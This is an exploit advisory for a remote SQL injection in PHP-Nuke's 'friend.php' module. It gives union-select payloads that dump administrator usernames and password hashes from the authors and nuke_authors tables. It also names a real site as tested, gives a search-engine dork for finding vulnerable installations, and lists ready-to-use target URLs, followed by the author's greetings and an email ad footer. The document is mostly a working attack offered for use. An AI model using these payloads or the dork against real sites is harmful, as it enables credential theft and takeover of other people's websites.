# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Date: [05.05.2010]
# Author: [CMD]
# Contact : cemede@ilkposta.com
# Version: [all version]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Tested on: [http://www.astreet.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat%28aid,0x3a,pwd%29/**/from/**/authors/**/where/**/radminsuper=1/*]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Code : [/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/*]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Dork : inurl:friend.php?op=FriendSend

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Th@nks : AmeN, MUS4LLAT, Kayahan, Sinaritx, JacKaL, Qasım, Metrp0l, Despot...

# Says   : Hemso bak bi dene bug daha xD ...  		 	   		  
_________________________________________________________________
Yeni Windows 7: Gündelik işlerinizi basitleştirin. Size en uygun bilgisayarı bulun.
http://windows.microsoft.com/shop